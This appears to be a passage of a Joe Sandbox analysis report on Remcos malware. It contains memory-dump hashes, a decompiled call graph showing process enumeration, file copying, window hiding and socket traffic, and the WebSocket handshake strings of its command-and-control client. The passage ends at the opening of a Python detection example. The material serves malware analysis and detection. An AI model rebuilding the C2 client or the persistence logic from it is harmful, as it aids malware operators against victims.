                                                                                                                                                                                                          • Opcode ID: 27ecbc13c4f476e08faf1acd90e795fb5476065945ee22aa8cd175318132d153
                                                                                                                                                                                                          • Instruction ID: ad8bbbc6685a7ad4b2c6a372fbd9d3efe289ee44324505102e6908621be6d084
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27ecbc13c4f476e08faf1acd90e795fb5476065945ee22aa8cd175318132d153
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44E0C2267191911F9B19E17E64305AB5BEBCBD726031AC17AF109CB345DC918C464390
Memory Dump Source
• Source File: 00000002.00000002.144018487368.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3260000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fbf35e115cf8518a1ffe93fc2ad51d880c13aeb4ad6b759918bfa9779498dea4
• Instruction ID: 6dfd0417336e61a4502afe3078df069ce7be2ed848bfecc00cc53923e4321de6
• Opcode Fuzzy Hash: fbf35e115cf8518a1ffe93fc2ad51d880c13aeb4ad6b759918bfa9779498dea4
• Instruction Fuzzy Hash: AAE012267602620B4B24F1BE68146FB969A8DD9891B1D11BAD985CB241DC818CC243E1
Strings
Memory Dump Source
• Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'kq$4'kq$d%qq$d%qq$d%qq$d%qq$tPkq$tPkq
• API String ID: 0-709841732
• Opcode ID: 30f0e9cc2b3a1018248a3f613fdeb9226eebdd33a5ee527a79aa56e9c0ed6c6c
                                                                                                                                                                                                          • Instruction ID: 651b2c83f4a267a1a0726784e6f61cc6308c148fa7be049827005268c8a244db
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 30f0e9cc2b3a1018248a3f613fdeb9226eebdd33a5ee527a79aa56e9c0ed6c6c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9941D9F0F00219DFC724DF588450A6ABBE2FF89794F2485A9D845AB396CB31DC41CB61
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144033826196.00000000093D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093D0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_93d0000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: XRpq$XRpq$XRpq$tPkq$tPkq$$kq
                                                                                                                                                                                                          • API String ID: 0-957243320
                                                                                                                                                                                                          • Opcode ID: a795fade8b224eb6569d32a7536741733127d0e8d96bad9c115efdcc3c851146
                                                                                                                                                                                                          • Instruction ID: f24d8da74822f2a195120b203785967818e2ae709aba9e8f1303022d6d678d5d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a795fade8b224eb6569d32a7536741733127d0e8d96bad9c115efdcc3c851146
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB61F636705105DFCB289F68E4606AABBE2BF85B14F24C46AE5429F294CB71DC41CFA1
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: tPkq$tPkq$$kq$$kq$$kq$$kq
                                                                                                                                                                                                          • API String ID: 0-3142828793
                                                                                                                                                                                                          • Opcode ID: 7d97650bd4f966c7eaf19d66196cc0a6b0d7a27aef82e501bc06239c7260553e
                                                                                                                                                                                                          • Instruction ID: 621099e4ae40001b0bda3dc35432f9682528a119efdaa7395bb2b4cc99698822
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d97650bd4f966c7eaf19d66196cc0a6b0d7a27aef82e501bc06239c7260553e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7512DB1704346CFDB349A69C850B6ABBB2AFC1790F24887BF5459B293CA75D840C772
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                                                                                                                                                                                                          • API String ID: 0-1342094364
                                                                                                                                                                                                          • Opcode ID: 0dfbff8a8f4e8ff1445137762ec0621c31858efb79e52f2d6473175bd42b7e40
                                                                                                                                                                                                          • Instruction ID: 88874dfef29a8f7c4fcfa0dad10abfe22080949133e088b3594f636354e1f0ee
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0dfbff8a8f4e8ff1445137762ec0621c31858efb79e52f2d6473175bd42b7e40
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D13129F67142A7CBD7359A6A845027AB7A2EFC2291B24497FC081C76A7CF3DC4458352
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq$4'kq$$kq$$kq$$kq
                                                                                                                                                                                                          • API String ID: 0-1023320533
                                                                                                                                                                                                          • Opcode ID: b4cf6ecd7431d847f75f25a1f65fa3c1a7e17d8c2c07438481ac9943e22fe9b7
                                                                                                                                                                                                          • Instruction ID: 6037a4ac7b4ff0ed275691d071e9ae33fe245b3e018de656836d1dc553b3ab82
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b4cf6ecd7431d847f75f25a1f65fa3c1a7e17d8c2c07438481ac9943e22fe9b7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E34119F5705345DFCB259B6888107BA7FA3AFC2290F1488AAD445CB697DF35C841C7A2
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq$4'kq$$kq$$kq$$kq
                                                                                                                                                                                                          • API String ID: 0-1023320533
                                                                                                                                                                                                          • Opcode ID: e28a2a845bbaf8df7ca64bb9849b19d00b33810865fff37aff7920e5d7957d6e
                                                                                                                                                                                                          • Instruction ID: 4f494c006dbcd6954890b575009e39ea62bb2fb7accf2a9999b6f959d845a877
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e28a2a845bbaf8df7ca64bb9849b19d00b33810865fff37aff7920e5d7957d6e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 674126F5700216DBDB398E69C410276B7A2BFC12A0B34C8BBD8558B297CB39CD41C761
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq$4'kq$$kq$$kq$$kq
                                                                                                                                                                                                          • API String ID: 0-1023320533
                                                                                                                                                                                                          • Opcode ID: c01ad3179c4d9c88e48dc73ad624aab8b48ff0e8137f568ef4c41ad79bba5021
                                                                                                                                                                                                          • Instruction ID: fdf98a9e61e1de67ca7a6edbf1bd5b9da179f538d579ccbbf032133283aa1f8e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c01ad3179c4d9c88e48dc73ad624aab8b48ff0e8137f568ef4c41ad79bba5021
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 473146F6F04252CFCB388A6984502B6B7A2AF962D1B24487FD44587287DB39C442C761
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq$4'kq$\\>j$\\>j$\\>j
                                                                                                                                                                                                          • API String ID: 0-2811065941
                                                                                                                                                                                                          • Opcode ID: d5b155fadb1764ecf20db33b56bf200e989605bf3b5b3147e13283539543402c
                                                                                                                                                                                                          • Instruction ID: 9cdd8b6c030b5eb8803a1d5dd0b65ae18eb22dfab86c1ab47afdc7f51c990b5a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5b155fadb1764ecf20db33b56bf200e989605bf3b5b3147e13283539543402c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 883193B120A3925FC726577888246AA3FB16F43290B1A08DBD5C0CF2E7CA185C46C7A7
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq$d%qq$d%qq$d%qq$tPkq
                                                                                                                                                                                                          • API String ID: 0-1865534145
                                                                                                                                                                                                          • Opcode ID: 0d4bb28defb39cb729dc18a5b9aad8f1ebadda29de5ca461f00ede73ecb8d1ea
                                                                                                                                                                                                          • Instruction ID: d1a5a7a11b0c9844d8dcc14a57a4cba5810a9653eb49cf7fa34daa9096d7b437
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d4bb28defb39cb729dc18a5b9aad8f1ebadda29de5ca461f00ede73ecb8d1ea
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E31A2F1F00215DFC724CF54C450AAABBA2FB88394F25C599E945AB362CB31DC41CBA1
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source

Execution Graph

Execution Coverage: 5.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 9.2%
Total number of Nodes: 812
Total number of Limit Nodes: 30
214d39e6 21877->21882 21901 214d46f0 28 API calls 21877->21901 21880->21875 21883 214d39a5 21880->21883 21882->21635 21884 214d3a70 28 API calls 21883->21884 21885 214d39c0 21884->21885 21885->21635 21887 214d4386 21886->21887 21890 214d433e 21886->21890 21888 214d443f 21887->21888 21889 214d4398 21887->21889 21917 214da5a6 28 API calls 21888->21917 21892 214d4449 21889->21892 21893 214d43b0 21889->21893 21898 214d43be 21889->21898 21890->21887 21897 214d4365 21890->21897 21918 214da5a6 28 API calls 21892->21918 21893->21898 21916 214d46f0 28 API calls 21893->21916 21903 214d4890 21897->21903 21898->21637 21900 214d4380 21900->21637 21901->21882 21904 214d4979 21903->21904 21905 214d48a9 21903->21905 21920 214da5c6 28 API calls 21904->21920 21906 214d4983 21905->21906 21908 214d48c5 21905->21908 21921 214da5a6 28 API calls 21906->21921 21910 214d498d 21908->21910 21911 214d48dc 21908->21911 21915 214d48ea 21908->21915 21922 214da5a6 28 API calls 21910->21922 21911->21915 21919 214d46f0 28 API calls 21911->21919 21915->21900 21916->21898 21919->21915 21920->21906 21925 214d4dd1 21923->21925 21924 214d4890 28 API calls 21926 214d4e45 21924->21926 21925->21924 21927 214d4330 28 API calls 21926->21927 21928 214d4e6c FindFirstFileW 21927->21928 21928->21674 21928->21675 21930 214d6dd6 21929->21930 21931 214d6db1 21929->21931 21933 214d4890 28 API calls 21930->21933 21931->21930 21932 214d6dbc 21931->21932 21944 214d5a30 28 API calls 21932->21944 21935 214d6de2 21933->21935 21935->21691 21936 214d6dc7 21936->21691 21938 214d34c1 21937->21938 21939 214d34d3 21937->21939 21940 214d3970 28 API calls 21938->21940 21942 214d3970 28 API calls 21939->21942 21941 214d34cc 21940->21941 21941->21684 21943 214d34f9 21942->21943 21943->21684 21944->21936 21945->21715 21946->21716 21947->21706 21948->21709 21950->21737 21951->21737 21952->21748 21953->21756 21955 214d7b1b 21954->21955 21956 214d7bef 21955->21956 21958 214d3970 28 API calls 21955->21958 21957 214d62e2 21956->21957 
21959 214d4160 28 API calls 21956->21959 21957->21768 21957->21770 21960 214d7b89 21958->21960 21959->21957 21966 214d5130 28 API calls 21960->21966 21962 214d7bbf 21963 214d3a70 28 API calls 21962->21963 21964 214d7bdd 21963->21964 21964->21956 21965 214d4160 28 API calls 21964->21965 21965->21956 21966->21962 21969 214d4afc 21967->21969 21968 214d4330 28 API calls 21970 214d4b57 21968->21970 21969->21968 21971 214d4890 28 API calls 21970->21971 21972 214d2734 21971->21972 21973 214d4cc0 21972->21973 21974 214d4ce0 21973->21974 21975 214d4330 28 API calls 21974->21975 21976 214d4d08 21975->21976 21976->21784 21978 214d4890 28 API calls 21977->21978 21979 214d4ea2 21978->21979 21979->21786 21981 214d2b42 21980->21981 22014 214d7310 LoadLibraryW 21981->22014 21983 214d2b6f 21984 214d2b75 21983->21984 21990 214d2b96 21983->21990 22018 214d3dc0 21984->22018 21986 214d36c0 26 API calls 21987 214d2951 21986->21987 21987->21793 22007 214d3860 21987->22007 21988 214d2bf2 GetLastError 21989 214d2b91 21988->21989 21989->21986 21990->21988 21996 214d2c15 21990->21996 21991 214d2d5b 21994 214d36c0 26 API calls 21991->21994 21992 214d2cd2 22035 214d2db0 28 API calls 21992->22035 21994->21989 21995 214d36c0 26 API calls 21995->21991 21996->21991 21996->21992 22034 214d3570 28 API calls 21996->22034 21997 214d2cdd 21998 214d2d07 21997->21998 22000 214d2d29 21997->22000 22036 214ddaab 26 API calls 21997->22036 22004 214d2d13 21998->22004 22037 214ddaab 26 API calls 21998->22037 22000->21995 22003 214d2d1f 22003->22000 22039 214ddaab 26 API calls 22003->22039 22004->22003 22038 214ddaab 26 API calls 22004->22038 22008 214d387f 22007->22008 22009 214d3891 22007->22009 22010 214d3dc0 28 API calls 22008->22010 22012 214d3dc0 28 API calls 22009->22012 22011 214d388a 22010->22011 22011->21796 22013 214d38aa 22012->22013 22013->21796 22015 214d73dd 22014->22015 22016 214d7326 8 API calls 22014->22016 22015->21983 22016->22015 22017 214d739f 22016->22017 22017->21983 22017->22015 22019 
214d3e25 22018->22019 22024 214d3dce 22018->22024 22020 214d3e2e 22019->22020 22021 214d3eab 22019->22021 22027 214d3e3e 22020->22027 22042 214d4460 28 API calls 22020->22042 22043 214da5a6 28 API calls 22021->22043 22024->22019 22026 214d3df4 22024->22026 22028 214d3e0f 22026->22028 22029 214d3df9 22026->22029 22027->21989 22041 214d3ec0 28 API calls 22028->22041 22040 214d3ec0 28 API calls 22029->22040 22032 214d3e09 22032->21989 22033 214d3e1f 22033->21989 22034->21996 22035->21997 22040->22032 22041->22033 22042->22027 22048 214d267b 22049 214d34a0 28 API calls 22048->22049 22050 214d2684 22049->22050 22087 214d76d0 CreateToolhelp32Snapshot 22050->22087 22052 214d2693 22097 214d3330 22052->22097 22054 214d269c 22055 214d26b7 22054->22055 22058 214d26ed 22054->22058 22102 214ddaab 26 API calls 22054->22102 22055->22058 22060 214d26cb 22055->22060 22103 214ddaab 26 API calls 22055->22103 22056 214d2723 22061 214d4ab0 28 API calls 22056->22061 22058->22056 22059 214d4160 28 API calls 22058->22059 22059->22056 22063 214d26d7 22060->22063 22104 214ddaab 26 API calls 22060->22104 22064 214d2734 22061->22064 22067 214d26e3 22063->22067 22105 214ddaab 26 API calls 22063->22105 22066 214d4cc0 28 API calls 22064->22066 22069 214d274a 22066->22069 22067->22058 22106 214ddaab 26 API calls 22067->22106 22070 214d4e80 28 API calls 22069->22070 22072 214d2762 22070->22072 22073 214d4cc0 28 API calls 22072->22073 22074 214d2778 CreateProcessW 22073->22074 22076 214d27bc 22074->22076 22077 214d2b20 38 API calls 22076->22077 22078 214d2951 22077->22078 22079 214d2a98 TerminateProcess WaitForSingleObject CloseHandle CloseHandle 22078->22079 22081 214d3860 28 API calls 22078->22081 22080 214d2acc 22079->22080 22084 214d36c0 26 API calls 22080->22084 22082 214d296f 22081->22082 22083 214d3860 28 API calls 22082->22083 22085 214d2983 22083->22085 22086 214d2ad7 22084->22086 22085->22079 22088 214d7755 22087->22088 22089 214d7732 Process32FirstW 22087->22089 22088->22052 22090 
214d774e CloseHandle 22089->22090 22092 214d7780 22089->22092 22090->22088 22091 214d3970 28 API calls 22091->22092 22092->22091 22093 214d4160 28 API calls 22092->22093 22094 214d7844 Process32NextW 22092->22094 22107 214d80a0 28 API calls 22092->22107 22093->22092 22094->22092 22096 214d7860 CloseHandle 22094->22096 22096->22052 22098 214d333e 22097->22098 22101 214d3353 22097->22101 22098->22101 22108 214ddaab 26 API calls 22098->22108 22101->22054 22107->22094 22109 214e5a65 22110 214e5a99 22109->22110 22111 214e5a70 RtlFreeHeap 22109->22111 22111->22110 22112 214e5a85 22111->22112 22115 214e60ec 20 API calls 22112->22115 22114 214e5a8b GetLastError 22114->22110 22115->22114 22116 214d7890 CreateToolhelp32Snapshot 22117 214d78bf Process32FirstW 22116->22117 22118 214d78e2 22116->22118 22119 214d78db CloseHandle 22117->22119 22121 214d78f0 22117->22121 22119->22118 22120 214d3970 28 API calls 22120->22121 22121->22120 22122 214d4160 28 API calls 22121->22122 22123 214d7a10 Process32NextW 22121->22123 22125 214d79d1 FindWindowExA GetWindowThreadProcessId 22121->22125 22122->22121 22123->22121 22124 214d7a2c CloseHandle 22123->22124 22125->22121 22126 214d79f7 ShowWindow 22125->22126 22126->22121 22127 214d1093 22139 214ddafb 22127->22139 22129 214d10a2 22131 214d10e3 22129->22131 22135 214d10f6 22129->22135 22146 214ddaab 26 API calls 22129->22146 22132 214d10ea 22131->22132 22147 214ddaab 26 API calls 22131->22147 22134 214d10f1 22132->22134 22148 214ddaab 26 API calls 22132->22148 22134->22135 22149 214ddaab 26 API calls 22134->22149 22141 214e5a9f 22139->22141 22140 214e5add 22151 214e60ec 20 API calls 22140->22151 22141->22140 22142 214e5ac8 RtlAllocateHeap 22141->22142 22150 214e4867 7 API calls 22141->22150 22142->22141 22144 214e5adb 22142->22144 22144->22129 22150->22141 22151->22144 22152 214d9293 22153 214d9299 22152->22153 22193 214d8550 22153->22193 22156 214d8550 44 API calls 22159 214d92e7 22156->22159 22157 214d3dc0 28 API calls 22158 214d93aa 
22157->22158 22160 214d36c0 26 API calls 22158->22160 22161 214d8550 44 API calls 22159->22161 22169 214d92ef 22159->22169 22162 214d93bf 22160->22162 22163 214d931a 22161->22163 22164 214d93c4 22162->22164 22166 214d9408 send 22162->22166 22167 214d8550 44 API calls 22163->22167 22163->22169 22197 214d84c0 70 API calls 22164->22197 22170 214d9423 22166->22170 22167->22169 22168 214d97c1 22169->22157 22171 214d94c7 send 22170->22171 22172 214d94f0 22171->22172 22173 214d9507 send 22172->22173 22174 214d956e 22173->22174 22175 214d9520 22173->22175 22176 214d959d send 22174->22176 22177 214d9557 send 22175->22177 22178 214d95c2 22176->22178 22177->22174 22179 214d95d7 send 22178->22179 22180 214d95fc 22179->22180 22181 214d960f send 22180->22181 22182 214d9620 22181->22182 22183 214d9641 recv 22182->22183 22184 214d9660 22182->22184 22183->22168 22183->22182 22185 214d8550 44 API calls 22184->22185 22186 214d9698 22185->22186 22187 214d979c 22186->22187 22188 214d96ae 22186->22188 22187->22164 22189 214d96d7 recv 22188->22189 22190 214d9704 setsockopt ioctlsocket 22188->22190 22189->22168 22189->22188 22196 214da5f3 22 API calls 22190->22196 22192 214d973a 22198 214d8520 22193->22198 22196->22192 22197->22168 22199 214d8534 22198->22199 22202 214e47a1 22199->22202 22205 214dff27 22202->22205 22206 214dff59 22205->22206 22207 214dff44 22205->22207 22206->22207 22209 214dff5f 22206->22209 22225 214e60ec 20 API calls 22207->22225 22227 214de3c5 38 API calls 22209->22227 22210 214dff49 22226 214dda9b 26 API calls 22210->22226 22213 214dff54 22218 214db288 22213->22218 22214 214dff84 22228 214e3d6a 44 API calls 22214->22228 22217 214d853e 22217->22156 22217->22169 22219 214db291 22218->22219 22220 214db293 IsProcessorFeaturePresent 22218->22220 22219->22217 22222 214db2d5 22220->22222 22229 214db299 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22222->22229 22224 214db3b8 22224->22217 22225->22210 22226->22213 22227->22214 
22228->22213 22229->22224 22230 214d1f42 22231 214d4330 28 API calls 22230->22231 22232 214d1f51 CreateDirectoryW 22231->22232 22233 214d4d80 28 API calls 22232->22233 22234 214d1f78 22233->22234 22235 214d4d80 28 API calls 22234->22235 22236 214d1f91 CopyFileW 22235->22236 22238 214d1fb6 22236->22238 22239 214d1fc0 22236->22239 22240 214d4160 28 API calls 22238->22240 22241 214d1ff0 22239->22241 22242 214d4160 28 API calls 22239->22242 22240->22239 22243 214d3a70 28 API calls 22241->22243 22242->22241 22244 214d2023 22243->22244 22245 214d67d0 31 API calls 22244->22245 22263 214d202b 22245->22263 22246 214d24f0 22290 214d38d0 28 API calls 22246->22290 22248 214d4d80 28 API calls 22248->22263 22249 214d250b 22250 214d2523 22249->22250 22252 214d4160 28 API calls 22249->22252 22253 214d2552 22250->22253 22256 214d4160 28 API calls 22250->22256 22251 214d2590 22292 214da5c6 28 API calls 22251->22292 22252->22250 22254 214d2578 22253->22254 22257 214d4160 28 API calls 22253->22257 22256->22253 22257->22254 22258 214d259a 22259 214d4cc0 28 API calls 22259->22263 22260 214d21d5 CreateDirectoryW CreateDirectoryW 22262 214d4330 28 API calls 22260->22262 22261 214d4160 28 API calls 22261->22260 22262->22263 22263->22246 22263->22248 22263->22251 22263->22259 22263->22260 22263->22261 22264 214d4e80 28 API calls 22263->22264 22265 214d22bc CopyFileW 22263->22265 22266 214d2365 CopyFileW 22263->22266 22267 214d4160 28 API calls 22263->22267 22271 214d4160 28 API calls 22263->22271 22272 214d258b 22263->22272 22274 214d6e60 22263->22274 22264->22263 22265->22263 22266->22263 22267->22266 22269 214d23ae CreateFileW 22269->22263 22270 214d23ea WriteFile CloseHandle 22269->22270 22270->22263 22271->22263 22291 214ddaab 26 API calls 22272->22291 22275 214d6eb4 22274->22275 22293 214d6fa0 22275->22293 22277 214d6ed5 22278 214d6f7c 22277->22278 22279 214d3dc0 28 API calls 22277->22279 22278->22269 22281 214d6efc 22279->22281 22280 214d36c0 26 API calls 22280->22278 22282 214d6f41 
22281->22282 22283 214d6f1f 22281->22283 22315 214ddaab 26 API calls 22281->22315 22282->22280 22284 214d6f2b 22283->22284 22316 214ddaab 26 API calls 22283->22316 22287 214d6f37 22284->22287 22317 214ddaab 26 API calls 22284->22317 22287->22282 22318 214ddaab 26 API calls 22287->22318 22290->22249 22292->22258 22295 214d6fad 22293->22295 22294 214d6fbe 22294->22277 22295->22294 22296 214d704c OpenProcess 22295->22296 22297 214d706b 22296->22297 22298 214d7063 22296->22298 22299 214ddafb 21 API calls 22297->22299 22298->22277 22300 214d707d NtQueryInformationProcess 22299->22300 22304 214d709a 22300->22304 22308 214d70df 22300->22308 22301 214d71a7 22301->22277 22302 214d70f0 GetCurrentProcess DuplicateHandle 22302->22308 22303 214d7176 22303->22277 22304->22303 22306 214ddafb 21 API calls 22304->22306 22305 214d7127 GetFinalPathNameByHandleW 22305->22308 22307 214d70c2 NtQueryInformationProcess 22306->22307 22307->22304 22307->22308 22308->22301 22308->22302 22308->22305 22309 214d71bc CreateFileMappingW MapViewOfFile GetFileSize 22308->22309 22310 214d7192 CloseHandle 22308->22310 22311 214ddafb 21 API calls 22309->22311 22310->22308 22312 214d71f5 22311->22312 22313 214d7202 UnmapViewOfFile CloseHandle CloseHandle 22312->22313 22314 214d7222 22313->22314 22314->22277 22319 214d2f82 22321 214d2f8d 22319->22321 22326 214d2fb9 22319->22326 22320 214d2f97 22322 214d2fa3 22320->22322 22372 214ddaab 26 API calls 22320->22372 22321->22320 22371 214ddaab 26 API calls 22321->22371 22325 214d2faf 22322->22325 22373 214ddaab 26 API calls 22322->22373 22325->22326 22374 214ddaab 26 API calls 22325->22374 22328 214d3019 22326->22328 22330 214d2ff7 22326->22330 22375 214ddaab 26 API calls 22326->22375 22331 214d3057 22328->22331 22336 214d3079 22328->22336 22379 214ddaab 26 API calls 22328->22379 22332 214d3003 22330->22332 22376 214ddaab 26 API calls 22330->22376 22338 214d3063 22331->22338 22380 214ddaab 26 API calls 22331->22380 22339 214d300f 22332->22339 22377 214ddaab 
26 API calls 22332->22377 22335 214d30bd 22343 214d30c9 22335->22343 22384 214ddaab 26 API calls 22335->22384 22336->22335 22342 214d30df 22336->22342 22383 214ddaab 26 API calls 22336->22383 22345 214d306f 22338->22345 22381 214ddaab 26 API calls 22338->22381 22339->22328 22378 214ddaab 26 API calls 22339->22378 22346 214d315a 22342->22346 22352 214d3138 22342->22352 22387 214ddaab 26 API calls 22342->22387 22350 214d30d5 22343->22350 22385 214ddaab 26 API calls 22343->22385 22345->22336 22382 214ddaab 26 API calls 22345->22382 22347 214d317b 22346->22347 22366 214d31c0 22346->22366 22358 214d3dc0 28 API calls 22347->22358 22350->22342 22386 214ddaab 26 API calls 22350->22386 22356 214d3144 22352->22356 22388 214ddaab 26 API calls 22352->22388 22360 214d3150 22356->22360 22389 214ddaab 26 API calls 22356->22389 22361 214d31a2 22358->22361 22360->22346 22390 214ddaab 26 API calls 22360->22390 22364 214d36c0 26 API calls 22361->22364 22365 214d31ad 22364->22365 22367 214d36c0 26 API calls 22366->22367 22368 214d3241 22367->22368 22369 214d36c0 26 API calls 22368->22369 22370 214d3258 22369->22370

Control-flow Graph (legend: Executed / Not Executed) of the function at 214d9293; the node and edge listing is not reproduced. Its basic blocks show a series of calls to 214d8550, seven send call sites between 214d9408 and 214d961e, a recv loop at 214d9641, a second recv at 214d96d7, and setsockopt/ioctlsocket at 214d9704 followed by a call to 214da5f3.
Strings
Memory Dump Source
• Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
• Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
Similarity
• API ID:
• String ID: Connection: Upgrade$ERROR: Could not parse WebSocket url: %s$ERROR: Got bad status connecting to %s: %s$ERROR: Got invalid status line connecting to: %s$GET /%s HTTP/1.1$HTTP/1.1 %d$Host: %s$Host: %s:%d$Origin: %s$P$Sec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==$Sec-WebSocket-Version: 13$Unable to connect to %s:%d$Upgrade: websocket$e$ws://%[^:/]$ws://%[^:/]/%s$ws://%[^:/]:%d$ws://%[^:/]:%d/%s
• API String ID: 0-1585909395
• Opcode ID: d218b156274b1dfa5b7329a4e83291710870e113ec1fb49e5eb7e960a1d23b0b
• Instruction ID: 51cff517ac93384069a37400b920c705cee9b72bb8388cd4a7b63f7cb33a7201
• Opcode Fuzzy Hash: d218b156274b1dfa5b7329a4e83291710870e113ec1fb49e5eb7e960a1d23b0b
• Instruction Fuzzy Hash: 1FE103B6900205AEEF14CF64CCA4FADB77CEB0A314F4481E9E60DA7286D7719649CF54
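The strings table above is the client side of an HTTP/1.1 WebSocket upgrade (RFC 6455): the payload parses a ws:// URL with four sscanf patterns, sends GET /%s HTTP/1.1 with Host, Origin, Upgrade, Connection, a fixed Sec-WebSocket-Key and Sec-WebSocket-Version: 13, and reads the reply with HTTP/1.1 %d; the control-flow graph of 214d9293 (a run of send calls, then recv) fits the same picture. The Python below is an added example and is not code from the sample or from this report: it rebuilds that handshake from the recovered format strings, computes the Sec-WebSocket-Accept a server has to answer with, and flags a captured request carrying the static key. The header order, the meaning of a missing port, and the rule that the bare Host: %s form is used only when no port was parsed are assumptions; the host names used are constructed placeholders, not indicators from this sample.

```python
"""Client side of the WebSocket upgrade reconstructed from the format
strings in the Remcos payload dump.  Added example, not code from the
sample or from Joe Sandbox.  Header order, the handling of a missing port
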